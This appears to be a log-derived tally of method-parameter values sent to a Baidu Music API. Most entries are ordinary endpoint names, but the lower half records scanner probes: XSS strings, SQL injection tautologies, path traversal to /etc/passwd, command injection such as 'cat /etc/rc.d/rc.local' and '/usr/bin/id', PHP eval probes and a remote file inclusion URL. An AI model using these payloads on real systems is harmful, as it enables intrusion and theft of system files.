baidu.ting.song.getInfos	64020477
baidu.ting.song.baseInfo	27485843
baidu.ting.search.lrcpic	22728878
baidu.ting.search.catalogSug	22475735
baidu.ting.user.listenAge	17899214
baidu.ting.song.play	16018318
baidu.ting.search.common	15555727
baidu.ting.song.down	9339292
baidu.ting.song.lry	7117367
baidu.ting.user.getUserBaseInfo	6659312
baidu.ting.song.getInfo	5902591
baidu.ting.artist.getSongList	5689180
baidu.ting.user.checkSuggestVersion	5480927
baidu.ting.search.getPhotoInfos	5214457
baidu.ting.search.lrcys	5178204
baidu.ting.artist.getList	4930931
ting.baidu.diy.getPlaylists	4815972
baidu.ting.billboard.billList	4413906
baidu.ting.diy.getNowOfficalList	3615917
baidu.ting.game.gamedetail	3409256
baidu.ting.favorite.isCollect	3170896
baidu.ting.plaza.getRecommendAlbum	3080138
baidu.ting.user.checkComVersion	3067125
baidu.ting.diy.gedanInfo	3036175
baidu.ting.artist.getInfo	2744841
baidu.ting.plaza.active	2731745
baidu.ting.radio.playAction	2490069
baidu.ting.user.config	2444716
baidu.ting.active.start	2430930
baidu.ting.song.playAAC	2334962
baidu.ting.plaza.getFocusPic	1969143
baidu.ting.diy.gedanHot	1656743
baidu.ting.search.suggestion	1441900
baidu.ting.artist.getinfo	1406193
baidu.ting.album.getAlbumInfo	1354949
baidu.ting.diy.category	1285748
ting.baidu.plaza.recdaily	1270425
baidu.ting.radio.getChannelSong	1240751
baidu.ting.diy.getSongFromOfficalList	1201026
baidu.ting.favorite.getCollectSong	1186834
baidu.ting.diy.addListenCount	1029710
baidu.ting.plaza.recdaily	994804
baidu.ting.plaza.getPartDesc	976696
baidu.ting.artist.getAlbumList	852190
baidu.ting.song.audio	766744
baidu.ting.user.RegistToImsg	720205
baidu.ting.diy.gedan	693623
baidu.ting.tag.songlist	669646
baidu.ting.tag.getHotTag	640902
	593824
baidu.ting.user.down	550422
baidu.ting.feedback.song	470286
baidu.ting.radio.getCategoryList	454065
baidu.ting.search.lrcyss	362263
baidu.ting.billboard.billCategory	350106
baidu.ting.search.getPhotoInfo	343481
baidu.ting.artist.get72HotArtist	304570
baidu.ting.diy.getPlaylists	284211
baidu.ting.favorite.getFavoriteSong	209689
baidu.ting.plaza.recommend	181017
baidu.ting.song.buffer	169800
baidu.ting.video.getList	166317
baidu.ting.game.gamelist	158828
baidu.ting.favorite.addSongFavorites	134990
baidu.ting.song.getMulInfos	126725
baidu.ting.diy.search	107888
baidu.ting.tag.getAllTag	106322
baidu.ting.diy.getSimilarGedan	95763
baidu.ting.diy.getOfficialDiyList	90447
baidu.ting.favorite.addSongFavorite	85053
baidu.ting.video.play	76103
baidu.ting.user.checkVersion	62068
baidu.ting.artist.getSpecialSongList	59557
baidu.ting.plaza.getNewSongs	47530
baidu.ting.favorite.delCollectSong	43010
ting.baidu.diy.getPlaylist	32640
baidu.ting.radio.getArtistChannelSong	29003
baidu.ting.radio.getFavoriteSong	24415
baidu.ting.plaza.getArtistPlaza	20385
baidu.ting.diy.getPlaylist	18777
baidu.ting.radio.serv	18110
baidu.ting.artist.getHighSongTitle	14545
baidu.ting.feedback.crash	14487
baidu.ting.diy.saveList	13011
baidu.ting.album.getList	11802
ting.baidu.film.getFilmInfo	11545
baidu.ting.song.getMulInfo	11207
baidu.ting.favorite.delSongFavorite	9957
baidu.ting.song.cloud	8851
baidu.ting.artist.getQianQianArtist	8120
ting.baidu.song.lry	6889
baidu.ting.user.nplogin	6366
baidu.ting.user.logout	4912
baidu.ting.diy.addListSong	4895
baidu.ting.video.category	4886
baidu.ting.diy.delListSong	4613
baidu.ting.diy.delList	4343
baidu.ting.user.regPassport	4187
baidu.ting.billboard.catalog	3996
baidu.ting.weixin.response	3824
ting.baidu.artistapp.renum	3522
baidu.ting.artist.getHighSongList	3500
baidu.ting.colorRing.listen	3137
baidu.ting.user.getMobileVcode	2696
baidu.ting.colorRing.getCode	2334
baidu.ting.colorRing.authset	2014
baidu.ting.favorite.delSongFavorites	1968
baidu.ting.user.getMessage	1907
baidu.ting.mv.getIndexMV	1874
baidu.ting.favorite.getFavoriteAlbum	1711
baidu.ting.artist.getSongVote	1513
baidu.ting.feedback.info	1466
baidu.ting.diy.getRecommendSpeical	1440
baidu.ting.user.registToUC	1399
baidu.ting.artist.getSongRank	1359
baidu.ting.artist.getSong	1350
baidu.ting.mv.playMV	1319
baidu.ting.diy.upList	1047
baidu.ting.favorite.getListenHistory	941
ting.baidu.artistapp.brief	797
baidu.ting.diy.addList	709
baidu.ting.video.recMv	579
baidu.ting.favorite.getOffenListenList	525
baidu.ting.song.getSuoSongInfo	517
baidu.ting.mv.searchMV	493
baidu.ting.user.activate	344
baidu.ting.colorRing.subscribe	336
baidu.ting.artist.getInfoByName	311
baidu.ting.colorRing.toneselect	310
baidu.ting.favorite.getInfoFromView	242
baidu.ting.song.getHash	221
baidu.ting.artistapp.photo	211
baidu.ting.user.login	204
baidu.ting.favorite.addAlbumFavorite	176
 /v8  ADw-script AD4-sslx=812812 ADw-/script AD4- nonxss	165
baidu.ting.plaza.getMisNewSong	128
ting.baidu.artistapp.newList	118
baidu.ting.mv.getMultiSongMVInfo	104
baidu.ting.favorite.delAlbumFavorite	81
ting.baidu.artistapp.news	79
ting.baidu.artistapp.briefs	75
baidu.ting.game.catalog	56
baidu.ting.user.addPassportInfo	49
baidu.ting.mv.getMVCategory	45
\' (	39
(	39
ting.baidu.plaza.getFocusPic	27
baidu.ting.album.getAlbumstyle	27
baidu.ting.song.playabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	21
baidu.ting.song.lryabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	15
baidu.ting.song.play\';alert(1);\'	14
../../../../../../../../../../etc/rc.d/rc.local	13
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_	13
http://cirt.lnet/rfiinc.txt_	13
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==	13
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_	13
set	13
c:/windows/win.ini	13
http://cirt.lnet/rfiinc.txt	13
${@print(md5(812812))}	13
%{	13
file:///etc/rc.d/rc.local_	13
/usr/bin/id;	13
\'];${@print(md5(812812))};//	13
file:///etc/passwd_	13
1\\\";cat /etc/rc.d/rc.local;\\\"	13
file:///etc/rc.d/rc.local	13
c:/windows/win.ini_	13
1;cat /etc/rc.d/rc.local;	13
string:{var_dump(md5(812812))}	13
../../../../../../../../../../etc/passwd	13
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local	13
${	13
../../../../../../../../../../etc/rc.d/rc.local_	13
file:///etc/passwd	13
1\';cat /etc/rc.d/rc.local;\'	13
../../../../../../../../../../etc/passwd_	12
ting.baidu.artistapp.send	12
baidu.ting.outerPassport.profile	11
baidu.ting.song.lry\';alert(1);\'	10
baidu.ting.song.play%\' and 8281=8281 and \'%\'=\'	7
baidu.ting.song.play</script><script>alert(1);//	7
baidu.ting.song.play<script>confirm(1)</script>	7
baidu.ting.song.play\') and 8288=8288 and (\'	7
../../../../../../../../../../etc/passwd_.html	7
baidu.ting.song.play\'/**/<scr/**/ipt>/**/>	7
baidu.ting.song.play(\')\'))(\")\'\"\"\"\")	7
baidu.ting.song.play\' and \'8281\'=\'8281	7
baidu.ting.song.playjavascript:alert(1)	7
baidu.ting.song.play\'\";alert(1);//	7
baidu.ting.song.play\";alert(1);\"	7
baidu.ting.song.play;alert(1);//	7
baidu.ting.song.play\'>\\\';</script>>\\\"><script>alert(1)</script>\'	7
baidu.ting.song.play</textarea></title><script>alert(1)</script>	7
baidu.ting.song.play<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	7
baidu.ting.song.play--></script><script>alert(1)</script>	7
baidu.ting.song.play>\'>\"><script>alert(1)</script>	7
baidu.ting.song.play\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	7
baidu.ting.song.play\'>\"></title></textarea></script><img src=a onerror=alert(1)>	7
baidu.ting.song.play\"><img src=1 onerror=alert(1)>	7
baidu.ting.search.lyrics	6
baidu.ting.song.lry\"><img src=1 onerror=alert(1)>	5
baidu.ting.song.lry%\' and 8281=8281 and \'%\'=\'	5
baidu.ting.song.lry</script><script>alert(1);//	5
baidu.ting.song.lry<script>confirm(1)</script>	5
baidu.ting.song.lry\') and 8288=8288 and (\'	5
baidu.ting.song.lry(\')\'))(\")\'\"\"\"\")	5
baidu.ting.song.lry\' and \'8281\'=\'8281	5
baidu.ting.song.lryjavascript:alert(1)	5
baidu.ting.song.lry\'\";alert(1);//	5
baidu.ting.song.lry\";alert(1);\"	5
http://cirt.lnet/rfiinc.txt_.php	5
baidu.ting.song.lry;alert(1);//	5
baidu.ting.song.lry<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	5
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.html	5
baidu.ting.song.lry\'>\\\';</script>>\\\"><script>alert(1)</script>\'	5
baidu.ting.song.lry</textarea></title><script>alert(1)</script>	5
baidu.ting.song.lry--></script><script>alert(1)</script>	5
baidu.ting.song.lry\'>\"></title></textarea></script><img src=a onerror=alert(1)>	5
baidu.ting.song.lry\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	5
baidu.ting.song.lry>\'>\"><script>alert(1)</script>	5
c:/windows/win.ini_.htm	4
file:///etc/passwd_.html	4
c:/windows/win.ini_.jpeg	4
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.jpeg	4
../../../../../../../../../../etc/rc.d/rc.local_.html	4
../../../../../../../../../../etc/rc.d/rc.local_.htm	4
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.html	4
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.jpg	4
../../../../../../../../../../etc/passwd_.php	3
http://cirt.lnet/rfiinc.txt_.html	3
file:///etc/rc.d/rc.local_.html	3
file:///etc/rc.d/rc.local_.htm	3
file:///etc/passwd_.jpeg	3
baidu.ting.artist.getSongListabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
file:///etc/rc.d/rc.local_.jpg	3
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.htm	3
../../../../../../../../../../etc/passwd_.jpg	2
baidu.ting.game.gameplay	2
baidu.ting.artist.getSongList\';alert(1);\'	2
baidu.ting.favorite.getFavoriteSongCount	2
c:/windows/win.ini_.jpg	2
file:///etc/passwd_.php	2
file:///etc/passwd_.jpg	2
file:///etc/passwd_.htm	2
http://cirt.lnet/rfiinc.txt_.jpeg	2
http://10.42.7.217/?1384540679.06	2
http://10.42.7.217/?1384536030.36	2
c:/windows/win.ini_.php	2
http://10.42.7.217/?1384534742.01	2
http://10.42.7.217/?1384533651.35	2
http://10.42.7.217/?1384524608.25	2
http://10.42.7.217/?1384520562.05	2
http://10.42.7.217/?1384514767.78	2
http://10.42.7.217/?1384514766.16	2
http://10.42.7.217/?1384509780.47	2
http://10.42.7.217/?1384509724.77	2
http://cirt.lnet/rfiinc.txt_.htm	2
http://10.42.7.217/?1384540677.2	2
http://10.42.7.217/?1384524602.5	2
baidu.ting.user.getuserbaseinfo	2
file:///etc/rc.d/rc.local_.jpeg	2
	2
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.php	2
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.htm	2
file:///etc/rc.d/rc.local_.php	2
../../../../../../../../../../etc/rc.d/rc.local_.jpeg	2
../../../../../../../../../../etc/rc.d/rc.local_.jpg	2
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.jpeg	2
baidu.ting.artist.getSongListjavascript:alert(1)	1
baidu.ting.artist.getSongList\'\";alert(1);//	1
../../../../../../../../../../etc/passwd_.htm	1
baidu.ting.artist.getSongList\";alert(1);\"	1
baidu.ting.artist.getSongList;alert(1);//	1
and	1
baidu.ting.search.catalogSu	1
<body onload=alert(222)>	1
showuserlink	1
baidu.ting.artist.get100HotArtist	1
http://cirt.lnet/rfiinc.txt_.jpg	1
baidu.ting.artist.get36HotArtist	1
baidu.ting.user.listelAge	1
listAll	1
baidu.ting.artist.getSongList\'>\\\';</script>>\\\"><script>alert(1)</script>\'	1
baidu.ting.artist.getSongList</textarea></title><script>alert(1)</script>	1
c:/windows/win.ini_.html	1
baidu.ting.artist.getSongList--></script><script>alert(1)</script>	1
baidu.ting.artist.getSongList>\'>\"><script>alert(1)</script>	1
baidu.ting.artist.getSongList\"><img src=1 onerror=alert(1)>	1
baidu.ting.artist.getSongList%\' and 8281=8281 and \'%\'=\'	1
baidu.ting.artist.getSongList</script><script>alert(1);//	1
baidu.ting.artist.getSongList<script>confirm(1)</script>	1
baidu.ting.artist.getSongList\') and 8288=8288 and (\'	1
\'	1
baidu.ting.artist.getSongList(\')\'))(\")\'\"\"\"\")	1
../../../../../../../../../../etc/rc.d/rc.local_.php	1
baidu.ting.artist.getSongList\' and \'8281\'=\'8281	1
baidu.tingrch.rch.common	1
baidu.ting.push.send	1
getcfcinhtml	1
